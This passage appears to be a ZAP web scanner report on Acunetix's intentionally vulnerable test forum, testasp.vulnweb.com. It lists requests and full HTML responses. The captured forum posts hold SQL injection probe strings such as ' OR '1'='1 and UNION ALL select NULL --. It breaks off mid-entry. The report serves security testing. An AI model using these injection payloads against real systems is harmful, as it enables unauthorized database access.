is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=18 |
| Method | POST |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=18 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:40 GMT Content-Length: 3066 |
| Response Body - size: 3,066 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=19 |
| Method | POST |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=19 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:40 GMT Content-Length: 3069 |
| Response Body - size: 3,069 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=2 |
| Method | POST |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=2 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:36 GMT Content-Length: 3068 |
| Response Body - size: 3,068 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1 -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=20 |
| Method | POST |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=20 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:40 GMT Content-Length: 3070 |
| Response Body - size: 3,070 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=21 |
| Method | POST |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=21 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:41 GMT Content-Length: 3069 |
| Response Body - size: 3,069 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=22 |
| Method | POST |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=22 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:41 GMT Content-Length: 3070 |
| Response Body - size: 3,070 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=23 |
| Method | POST |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=23 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:41 GMT Content-Length: 3084 |
| Response Body - size: 3,084 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> UNION ALL select NULL -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=24 |
| Method | POST |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=24 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:41 GMT Content-Length: 3085 |
| Response Body - size: 3,085 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' UNION ALL select NULL -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=25 |
| Method | POST |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
